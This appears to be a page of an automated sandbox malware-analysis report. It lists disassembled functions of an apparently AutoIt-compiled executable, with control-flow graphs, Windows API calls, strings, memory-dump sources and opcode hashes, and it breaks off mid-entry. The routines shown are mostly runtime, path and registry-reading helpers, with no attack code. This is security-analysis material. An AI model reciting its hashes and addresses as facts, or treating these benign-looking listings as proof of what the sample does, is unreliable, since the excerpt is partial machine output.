                                                                                                                        Function 00E53DCB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 258COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1230 e53dcb-e53df1 call e53f9b 1233 e53df7-e53e04 call e53f9b 1230->1233 1234 ec39f9-ec3a09 call e9cc82 1230->1234 1233->1234 1241 e53e0a-e53e10 1233->1241 1237 ec3a0e-ec3a10 1234->1237 1239 ec3a2f-ec3a77 call e7010a 1237->1239 1240 ec3a12-ec3a15 call e53e39 1237->1240 1251 ec3a98 1239->1251 1252 ec3a79-ec3a96 call e6ac65 1239->1252 1243 ec3a1a-ec3a29 call e9757b 1240->1243 1242 e53e16-e53e36 call e5bdf0 1241->1242 1241->1243 1243->1239 1254 ec3a9a-ec3aad 1251->1254 1252->1254 1256 ec3c24-ec3c27 call e728ca 1254->1256 1257 ec3ab3 1254->1257 1260 ec3c2c-ec3c35 call e53e39 1256->1260 1259 ec3aba-ec3abd call e93460 1257->1259 1263 ec3ac2-ec3ae4 call e5b7ff call e9a5be 1259->1263 1266 ec3c37-ec3c47 call e55800 call e9a46f 1260->1266 1273 ec3af8-ec3b02 call e9a5a8 1263->1273 1274 ec3ae6-ec3af3 1263->1274 1282 ec3c4c-ec3c7c call e932b0 call e7017e call e728ca call e53e39 1266->1282 1280 ec3b1c-ec3b26 call e9a592 1273->1280 1281 ec3b04-ec3b17 1273->1281 1276 ec3beb-ec3bfb call e5b6d0 1274->1276 1276->1263 1286 ec3c01-ec3c0b call e5a870 1276->1286 1290 ec3b28-ec3b35 1280->1290 1291 ec3b3a-ec3b44 call e6df5b 1280->1291 1281->1276 1282->1266 1293 ec3c10-ec3c1e 1286->1293 1290->1276 1291->1276 1299 ec3b4a-ec3b62 call e930ac 1291->1299 1293->1256 1293->1259 1304 ec3b64-ec3b83 call e5caee call e55cd3 1299->1304 1305 ec3b85-ec3b88 1299->1305 1328 ec3ba6-ec3bb4 call e5b7ff 1304->1328 1306 ec3b8a-ec3ba5 call e5caee call e934b4 call e55cd3 1305->1306 1307 ec3bb6-ec3bb9 1305->1307 1306->1328 1311 ec3bd9-ec3bdc call e9a525 1307->1311 1312 ec3bbb-ec3bc4 call e92fcd 1307->1312 1318 ec3be1-ec3bea call e7017e 1311->1318 1312->1282 1321 ec3bca-ec3bd4 call e7017e 1312->1321 1318->1276 1321->1263 1328->1318
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E534E2,?,00000001), ref: 00E53FCD
                                                                                                                        • _free.LIBCMT ref: 00EC3C27
                                                                                                                        • _free.LIBCMT ref: 00EC3C6E
                                                                                                                          • Part of subcall function 00E5BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F122E8,?,00000000,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?), ref: 00E5BE8B
                                                                                                                          • Part of subcall function 00E5BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?,00000002), ref: 00E5BEA7
                                                                                                                          • Part of subcall function 00E5BDF0: __wsplitpath.LIBCMT ref: 00E5BF19
                                                                                                                          • Part of subcall function 00E5BDF0: _wcscpy.LIBCMT ref: 00E5BF31
                                                                                                                          • Part of subcall function 00E5BDF0: _wcscat.LIBCMT ref: 00E5BF46
                                                                                                                          • Part of subcall function 00E5BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00E5BF56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<
                                                                                                                        • API String ID: 1510338132-1955187200
                                                                                                                        • Opcode ID: 49481d7705f1d8cdecd39ebdb2b3c60f7c08240016f53156b261e9c819c2d7db
                                                                                                                        • Instruction ID: 436702e651097d50becd9f06d1559634c656eb0faaf92379b5984bd5c6a47fca
                                                                                                                        • Opcode Fuzzy Hash: 49481d7705f1d8cdecd39ebdb2b3c60f7c08240016f53156b261e9c819c2d7db
                                                                                                                        • Instruction Fuzzy Hash: 92915E71A10259AFCF04EFA4CD51AEEB7B4BF08314F14942AF816BB291DB31AE05CB50
                                                                                                                        Function 00E53A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1333 e53a67-e53a85 SHGetMalloc 1334 ec4ac2-ec4ad1 call e53b1e 1333->1334 1335 e53a8b-e53a97 SHGetDesktopFolder 1333->1335 1336 e53b06-e53b11 1335->1336 1337 e53a99-e53ac6 call e53b1e 1335->1337 1336->1334 1343 e53b17-e53b1d 1336->1343 1345 e53afd-e53b01 1337->1345 1346 e53ac8-e53adc SHGetPathFromIDListW 1337->1346 1345->1336 1347 e53af1-e53af9 1346->1347 1348 e53ade-e53af0 call e53b1e 1346->1348 1347->1345 1348->1347
                                                                                                                        APIs
                                                                                                                        • SHGetMalloc.SHELL32(1<), ref: 00E53A7D
                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00E53AD2
                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00E53A8F
                                                                                                                          • Part of subcall function 00E53B1E: _wcsncpy.LIBCMT ref: 00E53B32
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                        • String ID: 1<
                                                                                                                        • API String ID: 3981382179-2494417897
                                                                                                                        • Opcode ID: c9634802378f39ec085489ca0cbb4107243451a9b6e7963f12926e0d01429c29
                                                                                                                        • Instruction ID: d13d5c8332c606450d90ef45a51dd3640b7abb6b350ab27e7803dfaa0fafc9e5
                                                                                                                        • Opcode Fuzzy Hash: c9634802378f39ec085489ca0cbb4107243451a9b6e7963f12926e0d01429c29
                                                                                                                        • Instruction Fuzzy Hash: 2F21AF76B00114ABCB10DFA5DC84EEEB7BDEF88345B004499F909E7241DB319E4ACB90
                                                                                                                        Function 00E6C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E6C948,SwapMouseButtons,00000004,?), ref: 00E6C979
                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00E6C948,SwapMouseButtons,00000004,?,?,?,?,00E6BF22), ref: 00E6C99A
                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,00E6C948,SwapMouseButtons,00000004,?,?,?,?,00E6BF22), ref: 00E6C9BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                        • Opcode ID: 8d78747e8042c48c9dc259506ab8134604cb5710004f37d0778d828f1acefd0c
                                                                                                                        • Instruction ID: ffc041053c28920207d7cc66cd3985ab9d7917509fbe2747cdbd195a1a09f833
                                                                                                                        • Opcode Fuzzy Hash: 8d78747e8042c48c9dc259506ab8134604cb5710004f37d0778d828f1acefd0c
                                                                                                                        • Instruction Fuzzy Hash: BA117C75551608BFDB118F64EC44EFF7BBCEF84788F20541AA981F7210D231AE449B60
                                                                                                                        Function 00E9CC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E541A7: _fseek.LIBCMT ref: 00E541BF
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        • _free.LIBCMT ref: 00E9CDC9
                                                                                                                        • _free.LIBCMT ref: 00E9CDD0
                                                                                                                        • _free.LIBCMT ref: 00E9CE3B
                                                                                                                          • Part of subcall function 00E728CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728DE
                                                                                                                          • Part of subcall function 00E728CA: GetLastError.KERNEL32(00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728F0
                                                                                                                        • _free.LIBCMT ref: 00E9CE43
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1552873950-0
                                                                                                                        • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                        • Instruction ID: 83403fd42f31aae7aa8677c869cb9b9e4e8527f157ce74c31ffaaaf96e799ac2
                                                                                                                        • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                                                                                                                        • Instruction Fuzzy Hash: F4515BB1904218AFDF149F64CC81AAEBBB9EF08344F1054AEF61DB7291D7715A808F69
                                                                                                                        Function 00E53BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EC3CF1
                                                                                                                        • GetOpenFileNameW.COMDLG32(?,?,00000001,00F122E8), ref: 00EC3D35
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E53A67: SHGetMalloc.SHELL32(1<), ref: 00E53A7D
                                                                                                                          • Part of subcall function 00E53A67: SHGetDesktopFolder.SHELL32(?), ref: 00E53A8F
                                                                                                                          • Part of subcall function 00E53A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00E53AD2
                                                                                                                          • Part of subcall function 00E53B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00F122E8,?), ref: 00E53B65
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 3714316930-3081909835
                                                                                                                        • Opcode ID: 38625206556e2786e2899561b9eba00bb1d5a1c6bd7b7f07c538fbaa3fc12662
                                                                                                                        • Instruction ID: 10b3e524b287f8c5ae6856dc4764ed074900e4c6c324d855f7d7d6b8f228cf42
                                                                                                                        • Opcode Fuzzy Hash: 38625206556e2786e2899561b9eba00bb1d5a1c6bd7b7f07c538fbaa3fc12662
                                                                                                                        • Instruction Fuzzy Hash: 9F117771A10298ABCF05DFA4D8456DEBBFDAF45705F00840AE901BB242DBB54A4D9BA1
                                                                                                                        Function 00E745EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E78E52: __NMSG_WRITE.LIBCMT ref: 00E78E79
                                                                                                                          • Part of subcall function 00E78E52: __NMSG_WRITE.LIBCMT ref: 00E78E83
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E78EB2: GetModuleFileNameW.KERNEL32(00000000,00F10312,00000104,?,00000001,00E70127), ref: 00E78F44
                                                                                                                          • Part of subcall function 00E78EB2: ___crtMessageBoxW.LIBCMT ref: 00E78FF2
                                                                                                                          • Part of subcall function 00E71D65: ___crtCorExitProcess.LIBCMT ref: 00E71D6B
                                                                                                                          • Part of subcall function 00E71D65: ExitProcess.KERNEL32 ref: 00E71D74
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1372826849-0
                                                                                                                        • Opcode ID: 16c4e6d61c9da9f328fea20a451d23cff569620a58a17c670305930ebf887903
                                                                                                                        • Instruction ID: 9fd7f32cffc33b158f9aa58bf665067b6975014c60de0a3112858a1c92ddacd6
                                                                                                                        • Opcode Fuzzy Hash: 16c4e6d61c9da9f328fea20a451d23cff569620a58a17c670305930ebf887903
                                                                                                                        • Instruction Fuzzy Hash: 61012DB16453019AE6243B74AC11B7A3388EF82765F51F02AF60DFB1C1DFB09C40D661
                                                                                                                        Function 00E9C450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00E9C45E
                                                                                                                          • Part of subcall function 00E728CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728DE
                                                                                                                          • Part of subcall function 00E728CA: GetLastError.KERNEL32(00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728F0
                                                                                                                        • _free.LIBCMT ref: 00E9C46F
                                                                                                                        • _free.LIBCMT ref: 00E9C481
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        • Opcode ID: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                        • Instruction ID: e86048657ffeee0f036d402edbf79863a990665bc0b42ea97baa9ec7fc530cb7
                                                                                                                        • Opcode Fuzzy Hash: 087bea45b9e552155f1be1c866ba964bb642fabb90d708dc02c9b9c981af8e32
                                                                                                                        • Instruction Fuzzy Hash: A9E012A170070196DE28B9796854BB353DC6F04755B24AC6DF55DFB142DF14E8808374
                                                                                                                        Function 00E6058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 0-4196123274
                                                                                                                        • Opcode ID: 06d00b8e3436eed87873ea6d56c6104c8572be78204e8615378bd459ea463f4c
                                                                                                                        • Instruction ID: 365449b177d1ecfd87805910a50dedef0e9516c62dad8594ab79e41e3f109b5a
                                                                                                                        • Opcode Fuzzy Hash: 06d00b8e3436eed87873ea6d56c6104c8572be78204e8615378bd459ea463f4c
                                                                                                                        • Instruction Fuzzy Hash: 0A229C70548350CFDB28DF24D491A6AB7E1FF84344F18A96DE89AAB362D731EC45CB42
                                                                                                                        Function 00E5131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E516F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E514EB), ref: 00E51751
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E5159B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E51612
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EC58F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3815369404-0
                                                                                                                        • Opcode ID: 48404737ab8060e63962355d0aa3039b543b0856bba878eedcb4c983adb94989
                                                                                                                        • Instruction ID: 4afe6491aa96e11de6e8f3353eb1873adb03b28d5aa62b2df0a1b71c47eda96d
                                                                                                                        • Opcode Fuzzy Hash: 48404737ab8060e63962355d0aa3039b543b0856bba878eedcb4c983adb94989
                                                                                                                        • Instruction Fuzzy Hash: 5171FCB490134D8BC714DF6AAC905C4BBE5FB6AB4478AD22ED20A977A2CB304448FF15
                                                                                                                        Function 00E54010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                        • Opcode ID: a324e39800027760cfa91cb59e98abcbf5bd41e0c9b1697d07306cfb7136ff19
                                                                                                                        • Instruction ID: 3feec28c9bb8d0b6e4e862689e2812cc74c968cdb858ea80a8686bb1c53cf246
                                                                                                                        • Opcode Fuzzy Hash: a324e39800027760cfa91cb59e98abcbf5bd41e0c9b1697d07306cfb7136ff19
                                                                                                                        • Instruction Fuzzy Hash: 42417CA1A0455497CB115B648D51BBF7FE28B1530DF286C65EE82BB1C3C6219DCC87A2
                                                                                                                        Function 00E534C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00EC34AA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                        • Opcode ID: e1b31a0018465ea5da61104306a5f578f62f95b7a8b0f82eefabbea25ca1dfce
                                                                                                                        • Instruction ID: 0b87a512e1a12abde96b0c59436e52e703a9ec1d491558199859a0fdd9420a51
                                                                                                                        • Opcode Fuzzy Hash: e1b31a0018465ea5da61104306a5f578f62f95b7a8b0f82eefabbea25ca1dfce
                                                                                                                        • Instruction Fuzzy Hash: 2AF0447190420DAA8F15EEB0D8519FFF7B8AA10344F10D926A825B2082EB359B0DDB21
                                                                                                                        Function 00E51DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00ECDB31
                                                                                                                        • IsWindow.USER32(00000000), ref: 00ECDB6B
                                                                                                                          • Part of subcall function 00E51F04: GetForegroundWindow.USER32 ref: 00E51FBE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 62970417-0
                                                                                                                        • Opcode ID: 731b4fa079a6662fdfc9064dea4d0f869ac531d126548af6ca3c5b02857d2ddb
                                                                                                                        • Instruction ID: 8749f88d0c25214e65e6f72372ab6d7ee53a9b842e814ebc3b3debff6c2b87d5
